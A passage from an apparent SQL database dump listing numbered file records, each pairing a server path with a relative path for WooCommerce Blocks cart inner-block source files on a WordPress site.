plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/frontend.tsx'),(8678,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-accepted-payment-methods-block/index.tsx'),(8679,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/block.json'),(8680,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/edit.tsx'),(8681,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/frontend.tsx'),(8682,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-block/index.tsx'),(8683,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/block.json'),(8684,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/block.tsx'),(8685,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/edit.tsx'),(8686,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/editor.scss'),(8687,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/frontend.tsx'),(8688,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/index.tsx'),(8689,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-cross-sells-products/style.scss'),(8690,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/block.json'),(8691,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/block.tsx'),(8692,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/edit.tsx'),(8693,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/editor.scss'),(8694,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/frontend.tsx'),(8695,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/index.tsx'),(8696,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/block.json'),(8697,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/edit.tsx'),(8698,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/frontend.tsx'),(8699,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/index.tsx'),(8700,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/block.json'),(8701,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/block.tsx'),(8702,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/edit.tsx'),(8703,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/frontend.tsx'),(8704,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/index.tsx'),(8705,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/block.json'),(8706,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/edit.tsx'),(8707,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/frontend.tsx'),(8708,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/index.tsx'),(8709,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/slotfills.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/slotfills.tsx'),(8710,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/block.json'),(8711,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/block.tsx'),(8712,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/edit.tsx'),(8713,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/frontend.tsx'),(8714,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/index.tsx'),(8715,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/block.json'),(8716,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/block.tsx'),(8717,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/edit.tsx'),(8718,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/frontend.tsx'),(8719,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/index.tsx'),(8720,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/block.json'),(8721,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/block.tsx'),(8722,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/edit.tsx'),(8723,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/frontend.tsx'),(8724,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/index.tsx'),(8725,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/attributes.ts'),(8726,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/block.json'),(8727,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/block.tsx'),(8728,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/edit.tsx'),(8729,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/editor.scss'),(8730,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/frontend.tsx'),(8731,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/index.tsx'),(8732,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/attributes.tsx'),(8733,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/block.json'),(8734,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/block.tsx'),(8735,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/edit.tsx'),(8736,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/frontend.tsx'),(8737,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/index.tsx'),(8738,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/block.json'),(8739,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/block.tsx'),(8740,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/edit.tsx'),(8741,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/frontend.tsx'),(8742,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/index.tsx'),(8743,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/attributes.tsx'),(8744,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/block.json'),(8745,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/block.tsx'),(8746,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/edit.tsx'),(8747,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/frontend.tsx'),(8748,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/index.tsx'),(8749,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/block.json'),(8750,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/edit.tsx'),(8751,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/frontend.tsx'),(8752,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/index.tsx'),(8753,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/style.scss'),(8754,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/component-metadata.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/component-metadata.ts'),(8755,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/block.json'),(8756,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/edit.tsx'),(8757,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/frontend.tsx'),(8758,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/index.tsx'),(8759,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/style.scss'),(8760,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/block.json'),(8761,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/edit.tsx'),(8762,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/editor.scss'),(8763,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/frontend.tsx'),(8764,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/index.tsx'),(8765,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/index.tsx'),(8766,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/attributes.tsx'),(8767,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/block.json'),(8768,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/block.tsx'),(8769,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/constants.tsx'),(8770,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/edit.tsx'),(8771,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/frontend.tsx'),(8772,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/index.tsx'),(8773,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/style.scss'),(8774,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/test/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/test/block.tsx'),(8775,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/register-components.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/register-components.ts'),(8776,'/home/tu